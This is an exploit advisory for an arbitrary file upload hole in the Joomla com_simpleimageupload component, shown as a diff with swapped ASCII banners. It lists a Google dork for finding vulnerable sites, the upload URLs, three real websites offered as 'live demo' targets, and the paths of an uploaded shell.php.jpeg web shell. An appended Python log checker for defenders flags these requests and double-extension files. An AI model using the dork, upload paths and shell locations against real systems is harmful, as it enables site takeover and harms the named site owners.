1 | - | _____ ________.__ __ |
1 | + | ,------. ,--. ,-----. ,--. |
2 | - | / _ \ ____ ____ ____ / _____/| |__ ____ _______/ |_ |
2 | + | | .-. \ ,---. ,--,--. ,-| | ,---. ' .-. ',--.,--.| | |
3 | - | / /_\ \ / \ / _ \ / \/ \ ___| | \ / _ \/ ___/\ __\ |
3 | + | | | \ :| .-. :' ,-. |' .-. |( .-' | | | || || || | |
4 | - | / | \ | ( <_> ) | \ \_\ \ Y ( <_> )___ \ | | |
4 | + | | '--' /\ --.\ '-' |\ `-' |.-' `)' '-' '' '' '| | |
5 | - | \____|__ /___| /\____/|___| /\______ /___| /\____/____ > |__| |
5 | + | `-------' `----' `--`--' `---' `----' `-----' `----' `--' |
6 | - | \/ \/ \/ \/ \/ \/ |
6 | + | dead_s0ul@outlook.com |
7 | - | -------------------------------------------------- |
7 | + | |
8 | - | | https://twitter.com/ungku_nazmi | |
8 | + | |
9 | - | | https://twitter.com/AnonGhostTeam | |
9 | + | |
10 | - | -------------------------------------------------- |
10 | + | |
11 | # Date: 05/11/2014 | |
12 | # Exploit Author: Donnazmi | |
13 | # Tested on: Windows + Linux | |
14 | # Google dork: inurl:/index.php?option=com_simpleimageupload | |
15 | ------------------------------------------------------------------------ | |
16 | ||
17 | # Exploit | |
18 | # -Live HTTP Header- | |
19 | ||
20 | 1) | |
21 | http://localhost/path/index.php?option=com_simpleimageupload&view=upload&tmpl=component&e_name=jform_articletext | |
22 | 2) | |
23 | http://localhost/path/administrator/index.php?option=com_simpleimageupload&view=upload&tmpl=component&e_name=jform_articletext | |
24 | ||
25 | Live Demo : | |
26 | http://www.bonyadtabari.ir/index.php?option=com_simpleimageupload&view=upload&tmpl=component&e_name=jform_articletext | |
27 | http://phurithat.ac.th/index.php?option=com_simpleimageupload&view=upload&tmpl=component&e_name=jform_content | |
28 | http://www.aviatime.com/en/people/administrator/index.php?option=com_simpleimageupload&view=upload&tmpl=component&e_name=jform_articletext | |
29 | ||
30 | # Shell path: | |
31 | http://localhost/path/images/pic/shell.php.jpeg | |
32 | http://localhost/path/images/shell.php.jpeg |
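
For defenders, a log check for the request pattern listed above, added here as an example that is not part of the original paste: it flags requests to the `com_simpleimageupload` upload view and requests under `/images/` for files with a script extension ahead of an image extension, grouped by client IP. The function names, the combined-log-format assumption, the POST submission and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Assumes combined log format: client IP ... "METHOD target HTTP/x" status
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})')
# Script extension followed by an image extension, e.g. shell.php.jpeg
DOUBLE_EXT_RE = re.compile(
    r'\.(?:php\d?|phtml|phar)\.(?:jpe?g|png|gif)$', re.IGNORECASE)

def classify(line):
    """Return (ip, tag) for a suspicious request, or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ip, method, target, status = m.groups()
    url = urlsplit(target)
    q = parse_qs(url.query)
    # Upload view of the component named in the paste
    if (q.get("option") == ["com_simpleimageupload"]
            and q.get("view") == ["upload"]):
        return ip, "upload_view_" + method
    # Double-extension file fetched from the image directory
    if "/images/" in url.path and DOUBLE_EXT_RE.search(url.path):
        return ip, "double_ext_" + status
    return None

def correlate(lines):
    """Map each client IP to the ordered list of tags seen in the log."""
    hits = {}
    for line in lines:
        r = classify(line)
        if r:
            hits.setdefault(r[0], []).append(r[1])
    return hits

# Constructed sample log lines (documentation IP ranges, not real traffic)
SAMPLE = [
    '198.51.100.7 - - [05/Nov/2014:10:00:01 +0000] "GET /index.php?option=com_simpleimageupload&view=upload&tmpl=component&e_name=jform_articletext HTTP/1.1" 200 2310',
    '198.51.100.7 - - [05/Nov/2014:10:00:09 +0000] "POST /index.php?option=com_simpleimageupload&view=upload&tmpl=component&e_name=jform_articletext HTTP/1.1" 200 512',
    '198.51.100.7 - - [05/Nov/2014:10:00:15 +0000] "GET /images/pic/shell.php.jpeg HTTP/1.1" 200 48',
    '203.0.113.9 - - [05/Nov/2014:10:01:00 +0000] "GET /images/banner.jpeg HTTP/1.1" 200 90311',
    '203.0.113.9 - - [05/Nov/2014:10:02:00 +0000] "GET /index.php?option=com_content&view=article&id=3 HTTP/1.1" 200 7000',
]

if __name__ == "__main__":
    for ip, tags in correlate(SAMPLE).items():
        print(ip, tags)
```

An IP that shows an `upload_view_*` tag followed by `double_ext_200` is the sequence to triage first, since the 200 status means the double-extension file exists on disk.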